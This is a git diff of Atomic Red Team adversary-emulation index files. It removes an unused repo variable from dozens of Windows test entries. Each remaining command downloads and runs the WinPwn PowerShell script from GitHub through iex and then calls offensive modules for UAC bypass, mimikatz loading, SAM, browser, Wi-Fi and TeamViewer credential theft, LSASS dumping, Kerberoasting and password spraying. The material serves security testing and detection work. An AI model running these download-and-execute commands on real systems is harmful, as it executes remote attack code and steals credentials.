diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 836eb92f..89320a25 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -3107,7 +3107,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic name: powershell @@ -3118,7 +3117,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp name: powershell @@ -3129,7 +3127,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup name: powershell @@ -10641,7 +10638,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') mimiload -consoleoutput -noninteractive name: powershell @@ -22393,8 +22389,7 @@ defense-evasion: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive " name: powershell - name: Tamper with Windows Defender ATP using Aliases - PowerShell @@ -32487,7 +32482,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -32499,7 +32493,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell @@ -35050,7 +35043,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic name: powershell @@ -35061,7 +35053,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp name: powershell @@ -35072,7 +35063,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup name: powershell @@ -51022,7 +51012,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -51034,7 +51023,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell @@ -75366,7 +75354,6 @@ persistence: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -75378,7 +75365,6 @@ persistence: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell @@ -90237,8 +90223,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive " name: powershell - name: Dumping of SAM, creds, and secrets(Reg Export) @@ -92614,7 +92599,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') lazagnemodule -consoleoutput -noninteractive name: powershell @@ -92625,8 +92609,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive " name: powershell - name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords @@ -92636,8 +92619,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive " name: powershell T1552: @@ -93488,7 +93470,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') browserpwn -consoleoutput -noninteractive cleanup_command: rm .\System.Data.SQLite.dll -ErrorAction Ignore @@ -93501,7 +93482,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') kittenz -consoleoutput -noninteractive name: powershell @@ -95249,7 +95229,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') domainpassspray -consoleoutput -noninteractive -emptypasswords name: powershell @@ -96193,7 +96172,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') sensitivefiles -noninteractive -consoleoutput name: powershell @@ -96205,7 +96183,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Snaffler -noninteractive -consoleoutput name: powershell @@ -96217,7 +96194,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powershellsensitive -consoleoutput -noninteractive name: powershell @@ -96228,7 +96204,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') passhunt -local $true -noninteractive cleanup_command: |- @@ -96247,7 +96222,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') sessionGopher -noninteractive -consoleoutput name: powershell @@ -96259,8 +96233,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive " name: powershell - name: List Credential Files via PowerShell @@ -99287,7 +99260,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Kerberoasting -consoleoutput -noninteractive name: powershell @@ -100653,7 +100625,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') GPOAudit -noninteractive -consoleoutput name: powershell @@ -100665,7 +100636,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') GPORemoteAccessPolicy -consoleoutput -noninteractive name: powershell @@ -101182,7 +101152,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') generaldomaininfo -noninteractive -consoleoutput name: powershell @@ -103250,7 +103219,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') shareenumeration -noninteractive -consoleoutput name: powershell @@ -103409,7 +103377,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') printercheck -noninteractive -consoleoutput name: powershell @@ -103732,7 +103699,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') winPEAS -noninteractive -consoleoutput name: powershell @@ -103744,7 +103710,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') itm4nprivesc -noninteractive -consoleoutput name: powershell @@ -103755,7 +103720,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') oldchecks -noninteractive -consoleoutput cleanup_command: |- @@ -103772,7 +103736,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') otherchecks -noninteractive -consoleoutput name: powershell @@ -103784,7 +103747,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Generalrecon -consoleoutput -noninteractive name: powershell @@ -103796,7 +103758,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Morerecon -noninteractive -consoleoutput name: powershell @@ -103808,7 +103769,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') RBCD-Check -consoleoutput -noninteractive name: powershell @@ -108998,7 +108958,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') spoolvulnscan -noninteractive -consoleoutput name: powershell @@ -109010,7 +108969,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') MS17-10 -noninteractive -consoleoutput name: powershell @@ -109023,7 +108981,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') bluekeep -noninteractive -consoleoutput name: powershell @@ -109035,7 +108992,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput name: powershell @@ -109237,7 +109193,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Dotnetsearch -noninteractive -consoleoutput name: powershell @@ -109249,7 +109204,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') dotnet -consoleoutput -noninteractive name: powershell @@ -109260,7 +109214,6 @@ discovery: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powerSQL -noninteractive -consoleoutput name: powershell @@ -120898,7 +120851,6 @@ initial-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -120910,7 +120862,6 @@ initial-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index c67c40ab..ebe01bb2 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -2401,7 +2401,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic name: powershell @@ -2412,7 +2411,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp name: powershell @@ -2423,7 +2421,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup name: powershell @@ -8383,7 +8380,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') mimiload -consoleoutput -noninteractive name: powershell @@ -18480,8 +18476,7 @@ defense-evasion: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive " name: powershell - name: Tamper with Windows Defender ATP using Aliases - PowerShell @@ -27044,7 +27039,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -27056,7 +27050,6 @@ defense-evasion: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell @@ -29424,7 +29417,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic name: powershell @@ -29435,7 +29427,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp name: powershell @@ -29446,7 +29437,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup name: powershell @@ -42169,7 +42159,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -42181,7 +42170,6 @@ privilege-escalation: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell @@ -62098,7 +62086,6 @@ persistence: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell @@ -62110,7 +62097,6 @@ persistence: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell @@ -74526,8 +74512,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive " name: powershell - name: Dumping of SAM, creds, and secrets(Reg Export) @@ -76132,7 +76117,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') lazagnemodule -consoleoutput -noninteractive name: powershell @@ -76143,8 +76127,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive " name: powershell - name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords @@ -76154,8 +76137,7 @@ credential-access: supported_platforms: - windows executor: - command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object - net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer + command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive " name: powershell T1552: @@ -76888,7 +76870,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') browserpwn -consoleoutput -noninteractive cleanup_command: rm .\System.Data.SQLite.dll -ErrorAction Ignore @@ -76901,7 +76882,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') kittenz -consoleoutput -noninteractive name: powershell @@ -78361,7 +78341,6 @@ credential-access: - windows executor: command: |- - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object 